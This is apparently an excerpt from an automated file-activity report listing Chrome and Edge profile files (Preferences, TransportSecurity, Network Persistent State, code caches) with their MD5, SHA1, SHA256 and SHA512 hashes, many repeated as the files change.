C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 8f980ce3742e8437256e8bd2a63431b3 |
| SHA1 | 355bdd88723a8c16d60b468258dacd5760547317 |
| SHA256 | 7842c35679b29eb9f9333f6a7d00f4daf64b11a5c1130aa6f250320ecdc1fe97 |
| SHA512 | 70ee255dc36b6471df679c177b2f295e36b7b24315d20ce845bc674ed0e74b3e59d31c31d397c1318698f3700dd455982f65d1fdc9ebf25c2e2509935d993195 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\7860fb57-cbcf-4ca4-b2b2-27472d461584.tmp
| MD5 | 34ffc1842610c56916f736c06677232d |
| SHA1 | e78d63432201b7c893214ce6de689db137a28d71 |
| SHA256 | f7a8fdd8d08ab98e28b8cb5f863e5d71708a07f68d1082c9d2048ac0cc7eb301 |
| SHA512 | 2b00261c4aa78ac1c3cd05c38109ccc47fbd5a346aca7970684a06395772cfc491097db97ec834bbcb17f808eb8e25120bb9fa1a04504adda09b6bbce45bda48 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | dedb2b991daceb3bfd6a046e5610c3c4 |
| SHA1 | f0cef52e7231e4d10089f6bac7630ff74e8e0f14 |
| SHA256 | d9742e532ba04f25967770b059da74dc1e63036c97ddb20b4adfab99e3d9b970 |
| SHA512 | 5caf34746d96b9d4377d9394f752d8fb2c5b70550cab9d5f4cc634349543e15c7f37806849becee1fb971716ef5e1f27b5fa3d49b60cff0dcd15780941e46b7a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56067634f68231081c4bd5bdbfcc202f |
| SHA1 | 5582776da6ffc75bb0973840fc3d15598bc09eb1 |
| SHA256 | 8c08b0cbceb301c8f960aa674c6e7f6dbf40b4a1c2684e6fb0456ec5ff0e56b4 |
| SHA512 | c4657393e0b9ec682570d7e251644a858d33e056ccd0f3eebffd0fde25244b3a699b8d9244bcdac00d6f74b49833629b270e099c2b557f729a9066922583f784 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 81e892ca5c5683efdf9135fe0f2adb15 |
| SHA1 | 39159b30226d98a465ece1da28dc87088b20ecad |
| SHA256 | 830f394548cff6eed3608476190a7ee7d65fe651adc638c5b27ce58639a91e17 |
| SHA512 | c943f4cfe8615ac159cfac13c10b67e6c0c9093851dd3ac6dda3b82e195d3554e3c37962010a2d0ae5074828d376402624f0dda5499c9997e962e4cfd26444c0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5eeec4d15302f42a82df93d600b1f8c0 |
| SHA1 | 6087e82bd43da744da42e4341f172d9eae908a64 |
| SHA256 | 9dd5c61453756a616c19347f137eb1e39259b3e5b8aa662beff3374967a6be90 |
| SHA512 | e1310dbf4f0e4783f11bc64a50843b12c3fe4feb74f0df2bed63c3ec0ab290066bd9e7058a2d2a25599acba479702de431ac8e847de465ea4f47f1f569652064 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0671b025ae42325036aa16875bac29e3 |
| SHA1 | d0bf5bd5205ad8da127cb81cf7a44ffb8b35c9a2 |
| SHA256 | dc5407fa3eeb79d72de707444ec16fd183c1840e637b6c4a08473c5c4cdd7585 |
| SHA512 | 8cc3a15a0bb3a8e905e9b207fb9f42e77ecfa8ce46283fe51ca24660db072f61fa4a8f5185e4957561b388eb3f2e766ee5d88c63f06d44b5ddb181108e40f8af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 65962888aa9f8bff28033e1da7e2ff6e |
| SHA1 | e822b7bd6594e42ea34e30db1675f25a8d362a09 |
| SHA256 | 937589311dcc02ae0e3cd88e1e2b8fcd26763765f42215215412cf3b2541d30f |
| SHA512 | b680cac0454798bb2804b766d28005e7d972d206d7c19451d8611e2e557eb711862b8747fed24195233560cfca7edf8a0044422c466f560732d6cba16b343433 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f42e13c3d1fceeecd62a10e3b2e71de7 |
| SHA1 | 130a9b1184928816e1325a5321641b4186c5dcc4 |
| SHA256 | dc7b492cafc646fe73d09440be148ebb13407adcc15757e747d686586bdb9a22 |
| SHA512 | e5343c3b5f39d2638355d275cd096aa88c3d8cbd721b1f518f81d7e1ad097b552dc85342f4ca6a6bd64499f15f205db40f221691a8e8848e110334717a551b13 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | b117700d100175a10390509c063fa8d0 |
| SHA1 | 81e70fad37be516f0ccf9236a4c4fe600955dbd1 |
| SHA256 | aa0982aa91f02e4fe40f23403a62bc731f937d1987e578afb7ab854eaa9bb88d |
| SHA512 | 2d68236d21e603a651b93618be9d4a538502580f1e816b17cc1ffdad7f634b84c2c88e8f04ef1d7da49867688331a77d8d636b932becc91fb630a30933c3439e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 823c9048e004511db6e78b05057599b1 |
| SHA1 | 9863cdd21e8716895841c20e9a429817c4851832 |
| SHA256 | f28da4f0dd1ca0ab0176fd62871ecda83d01002f22d0b97b4705a870f98afd67 |
| SHA512 | 5c5c40c62fb5427b80d0323fc410061391a1efd02e766dd553209f9a5dee7c681326dce486938d82f36ba67667e672a841dd6ef136bfeeb1d685c4d04c0c4a02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588af5.TMP
| MD5 | 624eac83680b920da3736d9b9c69c160 |
| SHA1 | f0af39c89ad3084d5274e372b5f41eab19b7c3c3 |
| SHA256 | 7c12d06bebbe90291fda7c84ca71916f2b24339ea26931aeb7d0d8dcf6b1c19c |
| SHA512 | 9d2c884f8607eef22c7d4267be90f232e56190923c64e911d87ea7715e2a304ffeda8d076b75050f7915c73113f4960cd4bf03a857f641383274493cc7735e93 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 654bd97468086456ac1d3c1bad2ed77b |
| SHA1 | c2951b471fe7bc20ce37e41652b7559f1c46380f |
| SHA256 | 6f0fcd9adcba9413e6c73b5f684810180c4aa67bf7110d5b59a5fc0d61750c7d |
| SHA512 | 0fe96b2ec1dd649874d6412f67ba16550bf5474c41d00c5a6101b8a4dc25cdfb344efe4b8310765fbad68f63155236c2d864a901ffb38a383685ee6d87ce456e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.roblox.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 29ac4c85cb5d714d673ae94b47fbaaf1 |
| SHA1 | b68de1095e403c3123addf5ea81d8a0fc3b9fba2 |
| SHA256 | b49357f9e8f41345f2e8d734b448175eceb8882cfc74f19603b84a2c02b6d342 |
| SHA512 | af1c5d4a0502a90f2ef12b972e390c6f516b58be6628d8fe8a2276d9ba9a76759eba30e0656ca5749e7167d6f7d62ff855f56c78efe12ddec247af8ffc92e873 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 494b7ac2ec50cf97317996875b9ac273 |
| SHA1 | de99f85856ceab158048af5a91aa08a2ff993c53 |
| SHA256 | ba6eef6705db44c3cc525ece3ca42e8cf996216e324240d91e46bd2376009716 |
| SHA512 | 0fa952990cfc5f559958c1c0f6314116b5d7dcb01286be9cdceec449a5bf9e3cf490e9b0f0b595ab0aebdfb5832a5dad9373233b614cd8fdba10c975510ca5aa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e932ccff7b1089cc3e840c28423c43d7 |
| SHA1 | 0266709a1731b799b1a8ba4290745948c0bf81c4 |
| SHA256 | fd31212946e980581985841da2c0f0f192a4faa30e73cec89d81d27e2e3c2827 |
| SHA512 | aadf07d7ed4d0c4722b84a072be78a7c69e247d9f1e084e92cf17155dab323861fc036d6957bdfa1ac420be5f5d7b38d56ef80f021a165b1667d8939a2754be6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 01c5dbff22c6d0317bbe4bb3098d7c96 |
| SHA1 | 3e0577212304c62921559f45baf93609ae358f1b |
| SHA256 | 905ddc8bd03ca8f16900b86d54341d2d1d4e7055d2ad292c995fe9bff902b7bc |
| SHA512 | ef94dbf95fd5549c2d624bc99651abbbd49c68c07fed8430b3b30a1ea1f331a8bf299efd3597c299750ed0da89a8f56b93fc76b243a964cbfe9090c420571cc8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 63a3eff9e2cca9c6e6a41537b664b662 |
| SHA1 | 4241c5c40633b30f31a45e7caad3d8bdc52eb8aa |
| SHA256 | 76bd4112af8320946e540ba6999be3f9b1655e31623547ed9a08df68a27cee98 |
| SHA512 | 611dffd7717193477ed2512f82a793824173f55b7c47801a58be5b141f833cd5d8897ab77b3ae30f04a39dd2fcbbaaffbf5d88e7db7d3ed7f3fcda0fd10950d5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e252f1068df176a3c486d4fb25effe73 |
| SHA1 | 8c8724908be6fa0e29587ed74d0c3e23d45cf1d5 |
| SHA256 | c9cb4feb2fc4f38b512ea3aa184d549d89b27f8a0614be7a717d4ce3e1e18f39 |
| SHA512 | f49958df9369cc160d98a247bd53045382759837a02151a413d0d225ef3a90962e721e99b4207151b9a935d766cb33a1e9c035e4bf2c214ead969b036fddfcba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2e63d57769fd4fd1f832d3e2691841e1 |
| SHA1 | 326c3ef60bc8874dfbd95410e7fb07c194606702 |
| SHA256 | 3db1491c2fa4a9343eae4c15ae2cf0e522220f8ecfe0172ea24bf40f2d3fc52c |
| SHA512 | a7548d3b1f19e81feac71c8e7aae8b356e5cd844f0e7d5a8bb5c2289fb2510e34415a9da11e33d5480813ec9a275e58e077473c4c45b74cb8f9222fcfa2cb20a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0cb9a27a279f0a2b486a765e993a3132 |
| SHA1 | 7e13a314f28b7fd6548de68b37f1abce6ef846a1 |
| SHA256 | e7746a7dfe0bb59f5124d2a4cd4ca65a95d1483f7710e0ed3bc043d137f528ce |
| SHA512 | 3d25034261dfd4566c064a0773bdae1b2b7cae09d427a48f4dbfd1be9aca0a46db67bc7f03e7ec4c970258eb39af1000131bcfc0efb57fe0799824ed78a4eee9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a07276f162db0e70df5c55831382b04b |
| SHA1 | 71125a94c64b734c6fc978ec157a70e6a4009a89 |
| SHA256 | cd0051acc4e8ce2c194c007c3269cc05ee7d5dea4b020f0bab8398dbc53b1b15 |
| SHA512 | fb7b873ae81cd3b12bcfe0bee9d652bae4881bae4dabc933de75087c3a74bdf22ac36eec698cb3ff941247fdce5fda9eb10aa8838fe80364c65063e9a664aafd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 42fcde8f4def7d287358b7162f2706b6 |
| SHA1 | 76ad56a88fe9f67fe23273d9d3df7de36e295c62 |
| SHA256 | 14895a2b6a84b4da7e5e4eca5836e4a0c95973788997fa5f86cd35802bf55759 |
| SHA512 | 8f07ff20e413ae9eb00d44bf83f5c6cf24409cb11bbe85a75abbd241cd6b4102d0fab8ccbe3d252d5abfc5be2b6ddfcb074ad0b194d7148eafffcc219fe00d42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 35dc3f0b869b25717704bcca9491db0f |
| SHA1 | d580a56d5632402c81e6b4dcfb0c0c341d541b6b |
| SHA256 | 4626264b65f3594a79a3d288c617311d0f1bf7adef3fecc14e1c834a00b774da |
| SHA512 | 57690d0a1df95804fbf94afea93aecdd37b5d462796efb7c2a5270ac8fa2fbbab89ad4d4c11e6284a8530ea7fdac3fe52c1b019b8833e2adb508ad9a898e99df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 250ab213a7926e7b67849f4ad8015889 |
| SHA1 | 2ef21bac45e3be4285ff517389dd471149067981 |
| SHA256 | d47216f5f6fe41099e1682fcdf44f408f875ca6b803baaf72fc71db8601cb961 |
| SHA512 | 969ff0a50aadbea9f728781173cec22059ac5d65b28a3b680e3e42dba92411f5d6ad4bfa78ecf7f5d657429be8ace81643e1c4bc52ebb2d4632f552818c9163f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2515914bfba7b628d195cc3160df99e9 |
| SHA1 | 196d72b483100307b17f152462b67053d50bf7fc |
| SHA256 | 060bfc92d164a6b08a146eb7415e8f2aa243a19c4ea0b5976a281275c5bebbb6 |
| SHA512 | 2e5f8616c31eae1b9bfb9a442a01ea3eaca9ad858caadd4f75485cbbc6d8e8433c0285de3c1cefe380ebd46482a91507318a243bbfdfdfb2c8e4006ca9738d32 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | cec315f1e441d6ebc6a39ab6dc351e47 |
| SHA1 | 1b81a9c5583b617f4e5549f651902d9fadba1c60 |
| SHA256 | 61f3dc351b04a0da2cb568b4b098f4e2c0cf35b5662c82f20c1c0d44232e0826 |
| SHA512 | bf8a09d8805dbbd148b0d5c257145476f6411a7b94901cca41ccdd6453ce029a10b1122d103d7b25f8ba4b0a97f72a0300399d05f91a6e0e2ccad88e45ce0ed0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e4a88f6cbb817e733d6a6d40250956a |
| SHA1 | 6e6baacdd87a294a96e7e00fe7bf229aa4d2d749 |
| SHA256 | f2a5e88624e4b0959a8136b7d229af841f81dd077c366c057d9d08ca6a13388e |
| SHA512 | 647b38217813c21fc4c7ee217ae92b2e499c3853de64c5cb33fa729de0bad555f5d469a8ee6bf6c9892040514e2d1076b8927eec12a896a7683b1bfb39d33451 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e9c539764c0e3fe14c1649b9ee057ea5 |
| SHA1 | 0ce75e23e65fdeba81df2814e02aaf508c720b02 |
| SHA256 | f4fa6084ab91970434c5af3481943a59eccc1d0ed1d09dd02a07a5d7ffb1e5c4 |
| SHA512 | d0ed96d6199cb2ad4625d031c0823a0d2c020ab729c03b9bdfd9ec7510d70d9a2ee868ff3a05e3afa3dc7179451f6f4ded0c28379309e0f001968e198944e2ed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 51e1419660064be094c45f674b9084cd |
| SHA1 | 8cb7dd9e66b34585a3910eba91db6714ff054bb3 |
| SHA256 | 1894cf9e281ed55334e6766929933bcba0bafdd87468db71efabdb7d03155a54 |
| SHA512 | 95069da1e460d552e710ae97927dfc1ab9e83518190d5f2f6f44c7d35abe5feab66ebb7c238fe5021dcda087dc754b0cbcca98611406b6fb091dabf246cf18f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3f45ac4a3e3fa854d48e07df95ebc9d6 |
| SHA1 | 83bfcaabb046f956db03ba3e6e16a015cb4cca6f |
| SHA256 | 459ae06d9465bad4f5a8a738a6c28a73596c84ad7faaf6342cdcc582d956ea93 |
| SHA512 | e5db043cd7e089fcef49401ce95d552fb79ffb1809c0d19a850198458bc5150c0966c4c0cdaf8606fbeb963f59681316c9b2e75f0e7f7386d9e9bd8da4af9f2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2d00f51a1ba334e38577194c09e3543e |
| SHA1 | 03afffaaab774d779d770820d55094db80fde67f |
| SHA256 | 69b93336a3199d7d159acbb945d726e1a69371c36c8ed1ab3f504356c1373017 |
| SHA512 | e8a465708eb6a87fc1412782539e0715971d6187b5a3eba381ae5b2b95de0e0d3fb69e8454062dd9139e3028cefc73bc4faf314c378182ca13a6f03a97630aa0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 027ea71c8edffafe271a6d700d632bec |
| SHA1 | b831026cbcd3e0ec0bd487acc1d12c4d40d8d4e2 |
| SHA256 | d53c33b5c4ffacb12b392bebcd33cc9ca84df69cda84893b3eb389e33b3bb89c |
| SHA512 | 4d807a4cb86e734f01169bc83d531d51a8b748b9d1181a9ab418e465fba294bf70347196c40c6b788d457cb460954d7c8765f5cc1be9a6a3b841f8adb18324e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8517859dd66cc9f2c4276d5a526b1794 |
| SHA1 | 3d5b67e8347f50b1a6bb8896ffc1cad4e2aa1819 |
| SHA256 | afc5cda03932cd934f76ef2f21bf666af8132c3132c4e2f7dcb275d5e7b109ad |
| SHA512 | 049c9b94c2aa69b51314b8177bcfa0d9d6a758c9337321454895a24daeea68575e52dab49086e1f18c2f8b8d01e9e501dbc06ae8d9b1c4a44f4d1a41dde3ba78 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bd61f8c5ecc9c2e913b51e22b9ca9ec1 |
| SHA1 | 520b6fdbfa580214e97ee715fa23c4d32cdbf3f6 |
| SHA256 | 989da36e3fefb51d09c66cf0b27534eab4a2c33dcb16129591da9247c5bc9758 |
| SHA512 | 2d8cd8f42a0e184eebd2322a8870e06e18d6941a606570b823d7df6f612fddd2bd4d5daefd2f621efc1df7c9166fc07e6da7643abcef0d9df2e13587891be149 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a421f375072c64180af9b72d446a7fd6 |
| SHA1 | 9e4accd92489401c80f7bc7b99b38fe843abda9a |
| SHA256 | 619b89fde2e8605a7b77e6cb58c9e3f906a8ca4410e6b47b153bc6bd2cb8b35f |
| SHA512 | 88f24c708ca6f11d3a0888c9a621568ed42284680884fd6bc788a496dfa8c1306f66072a370f958c3626123ab52dda235e84d3159834eb756565c1636d158a3f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a496ac166dae695cc1031730733f1172 |
| SHA1 | 4e600ee89b57e4e0d85e4eb69dfc9f36f7329373 |
| SHA256 | 796161edf54e66ef9e52f9036b59826ac9b9968793b6135a7355422b0a7389e5 |
| SHA512 | dcfbdc9ed0cdf5c21b89fccfb5f99ac12c9a6b5a7bef21be68bf2e10afe6638a66b539b26f14a07d6c6d2b879d0cc08b325c8d0130202907ad059a0f14690914 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | e3d00ae0a9c6973d31f4a9fcea2e5c0e |
| SHA1 | 6b21f59d04148a0a1d1f289f8dec026450e91a08 |
| SHA256 | c774b3d395c78964ec699038d067a9db1616ca8cbd2f9e7a227796ba78858932 |
| SHA512 | 4c2e565106137fe9d67e61634b94fda5c0267c596443e911e27345f3d037a8eda4391bda94d516e2b6c99e081dbb1d9268971922e747c7144a84776cc46f2e42 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | df8d84bef9e681bb6d2fe64efccd32b8 |
| SHA1 | 40a23ffee70963dc88e2c17152c010380dec97d3 |
| SHA256 | e65e02927ac15592466a769d65cb2940c28d49bbe8aba6b4de80cf65fa868bc4 |
| SHA512 | f8017b18b3ad7d45ea994aed5d41a9e434ed11cd637038176573a5ad9dca2db29eb6a089cb4abca492dfe6c5789e06dbb128512388dbc60eb141cd4948f781fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ac88614ea408eac6b565fc6f5cbbb4bb |
| SHA1 | 048fe55906790993f2cd9766fe76ace2b0f14a5c |
| SHA256 | 75328bfd3aec55309bff9c0d9f6ed27a9fc4f50f9d5a1c77835b6781cff2b099 |
| SHA512 | 763802a4b2575599bad714fa467ef5b23b313a8102dc24edb85852cdc42d9ba62002f3d5886ed7fc33a319cd0ffa652256f0cde102b541e636b320bd873f024b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d6500b996a0999640aba6c0fc6522818 |
| SHA1 | 1fdf199fd5d104ed9818d589c458c87c8c21d374 |
| SHA256 | 32310b3c20fc179f9cbae585f552e116a7ad37eda3b029f9fd106cee1294fcdb |
| SHA512 | 46075a5a7805cec9ed0a19ef7be0df239aea3f712977b25c06aad57f8d99bc073053fe3970189f598e51cd44e48832174c7f9ffb46060000879285e447a3a556 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | cbc729b5c0a6f80d7f784185b8e0d0fb |
| SHA1 | adad34f070e6e0761ffdd708800b7b0e84f46c97 |
| SHA256 | 7927699307674382d734f8d8dbec1a2f076c633b59efa93a8c045afe773f22f1 |
| SHA512 | 35cf637078601c8239f89b1a5aac0639e68a887495cf19934f9952fdecec27dd2603b927241f4c8d5a5d281045a8d62fd4499c52bfd044921029d5a0f0772826 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 19a04754aa1f586d475c57940824978a |
| SHA1 | 39aa9c8a69eb474105f5330bf4f504a45064470e |
| SHA256 | 6d800ed481821a9cb84e95bb718cdc7d6716e7dab9008b4e35f0f06971888c5a |
| SHA512 | 9ca6681f62211e658ca39abcccf0a2e67e07ffaf3efe29299a065752eee46668648d358b52345471333a9c4f9d11327a6dba408d16559ffb107ceefa5c728f55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7983b1831d7142a655a69c5299d6fe23 |
| SHA1 | c10e3aa3ae2228560170a688ee712e0ff7b4cb48 |
| SHA256 | 21443a4732e6e66da055f531bdfb80a38a1d47606f8663b6004a8de642da24b1 |
| SHA512 | ab81cb71a207bb059489a56be1b7793c29360d9f6956d9a5d78a09d30027b8f070c8ca2732b52a6a7ed60eba12402289e7a7966c2534f9a0bf0a8e6815f4b801 |